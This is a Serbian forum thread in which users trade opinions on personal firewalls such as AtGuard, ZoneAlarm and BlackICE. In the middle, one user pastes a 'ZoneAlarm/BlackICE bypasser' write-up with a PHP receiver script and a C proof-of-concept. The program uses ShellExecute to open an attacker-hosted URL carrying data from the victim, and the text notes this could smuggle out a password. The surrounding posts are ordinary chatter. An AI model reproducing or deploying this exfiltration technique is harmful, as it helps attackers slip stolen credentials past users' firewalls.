pitanje za at guard

pitanje za at guard

offline
  • Pridružio: 03 Avg 2003
  • Poruke: 398
  • Gde živiš: Deutschland

Hocu da mi daju svoje misljenje urednik sajta virus. neobee ,Serbian Fighter i urednik
Predrag Damjanovic koji je bolji firewall dali at guard 3.22.09 ili zone alarm pro 4
U jednom forumu na elitesecurity tema- koji firewall bi mi preporucili
Pise : za vreme Slobe kada je bilo napada sa svih strana samo ad guard je zaustavio te napade pa bih hteo da cujem vase misljenje
Hvala



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • Vlada
  • Pridružio: 20 Apr 2003
  • Poruke: 3360
  • Gde živiš: Beograd

A sta sad, mi drugi nemamo misljenje ? Smile

Salim se, AtGuard, lepse moze da se namesti od Zone Alarma, a i sigurniji je!



offline
  • Pridružio: 20 Apr 2003
  • Poruke: 2091
  • Gde živiš: Novi Sad

a bre... vidi ti turistu.... tek stigao a vec proziva :-)... ccccc bas kao sto rece Vlada PUB.... mi ostali nemamo misljenje :-D
e pa da ti kazem... BlackICE je dobar..... :-)

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

VladaPUB ::A sta sad, mi drugi nemamo misljenje ? Smile


Gologuzi balavci koji se krevelje u kameru i cupaju onu stvarcicu i ne treba da imaju misljenje...SmileSmileSmile

offline
  • Peca  Male
  • Glavni Administrator
  • Predrag Damnjanović
  • SysAdmin i programer
  • Pridružio: 17 Apr 2003
  • Poruke: 23211
  • Gde živiš: Niš

atguard ako koristis win 95/98/me/2000

offline
  • Puky  Male
  • Scottish rebel
  • Pridružio: 18 Apr 2003
  • Poruke: 5815
  • Gde živiš: u Zmajevom gnjezdu

@ zorantasevski
Trenutno koristim ZoneAlarm Pro with Web Filtering version 4.0.123. .... meni je sasvim OK.

@ Guard nisam koristio duze od 10 min. Zasto? - ne secam se.

Neko poredjenje firewall programa mozes pogledati na sledecoj temi:
http://www.mycity.rs/phpbb/viewtopic.php?t=968

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

Jel radi ovo...ajd neko da proba...WinkSmile


                                                     /   ,
                                           /\       \ | /       /\
                                           |  \ \  _.=._  / /  |
                                             \  .  "     "  .  /
                                             /  / ^ \ / ^ \  \
                            . ' ` `  "  ,  /   |  0 | | 0  |   \  ,  "  ` ` ' .
                           /      ,       `  '  \  .---.  /  '  `       ,       \
                         /`     /`\    ,  . "  (          )  " .  ,    /`\      `\
                         /`            (    '  .  ' -.- '  .  '    )             `\
                         /"`              ".  _     :    _  ."                `"\
                           ` / .  ' ` " = ., _ `` = ``_ ,.  =   ` '  . \ `
                         . - " - .              )       (                 . - " - .
+- - - - - - - - { ' .    ' ` }- - - - -~     ~- - - - -{   '  .    ' ` } - - - - - - - -+
|                      ` " ---  " `                                  `   " ---  " `                      |
|     Black Ice Defender/ ZoneAlarm Bypasser                                         |
|     To get this idea i tryed to turn my brain                                              |
|     upside-down! the inculude function in php                                          |
|     me this idea...!                                                                                   |
|                                                                                                              |
|     www.truti.com                                                       Made By Truti     |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -+

You know how to make a web page there can resive variables?

in php it's simple just do this:

<?php
echo "String from victim: $blahblah";
?>

Name it "bypass_script.php"

and point a url at:
http://www.Your_Host.com/bypass_script.php?blahblah=The_String_You_Whant_To_Get_From_The_Victim

(The_String_You_Whant_To_Get_From_The_Victim is ment to by replaced with some thing else, a bad person cud place a password and get it trough the firewall system!). Remember the max url length is 255 characters!

Now you think that this all sounds good and easy, but how do you send the string from the victim?
I have made a little C program with a Winapi buildt in it, cus the "ShellExecute" commands (API) job is to open any file with the default program (a webpage's default program is offen a webrowser ;-)

Proof Of Concept Code:

<---------------------------------Start On Source Code--------------------------------->

// Made by: Truti - www.truti.com
// Programmed on Visual C++ 6.0 - STD
// Proof Of Concept Code for bypassing some personal firewalls
// parameter for the [Program].exe [thing_you_want_to_open_on_the_victims_computer]
// e.g. [Program].exe http://www.Your_Host.com/bypass_scr......

#include <windows.h>
#include <tchar.h>

int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR lpCmdLine, int nCmdShow)
{
HINSTANCE hInstance = ShellExecute(NULL, _T("open"), lpCmdLine, NULL, NULL, nCmdShow);

return (NULL);
}

<----------------------------------End Of Source Code---------------------------------->

You are not vulnerable if:
You don't use a webbrowser for surfing on the web, or ZoneAlarm is set to stop even surf (i have never seen that!).

(I can imagin that this trick works on manny other servers than just the tow mentioned, if you test it on otheres let me know! (main is on www.truti.com - (i change it in the next 2 weeks)))

Links:
shellexecute syntax: msdn.microsoft.com/library/en-us/shellcc/platform/ shell/reference/functions/shellexecute.asp
http://www.zonelabs.com/
http://blackice.iss.net/

(I hate when header is missing)
http://www.truti.com/headers/tchar.h
http://www.truti.com/headers/windows.h


EOF!

offline
  • Pridružio: 26 Apr 2003
  • Poruke: 1947
  • Gde živiš: Srbija

Trenutno nista ne guram, nema resursa na masinu,

Inace
Norton Internet Securuty ili @guard
Eventualno Roxio

Mada u principu svaki lepo setovan dobro radi.

Ne volim Za.

Moj povratak ovde se ocekuje vec neko vreme, znam Sad ali zdravlje mi je zivahno, finansije jos zivahnije, a slobodno vreme bas onako naj!

Ko je trenutno na forumu
 

Ukupno su 1234 korisnika na forumu :: 37 registrovanih, 6 sakrivenih i 1191 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: _Rade, Avalon015, bojank, bokisha253, BORUTUS, Bubimir, cifra, Denaya, Dimitrije Paunovic, Dorcolac, dragan_mig31, FileFinder, Haris, Karla, Koridor, Kriglord, Kubovac, lcc, mercedesamg, Mercury, Metanoja, milenko crazy north, miodrag, mrav pesadinac, oldtimer, S-lash, Shinobi, Singidunumac, Srky Boy, ss10, stankolich, Tvrtko I, virked, VladaKG1980, voja64, šumar bk2, 223223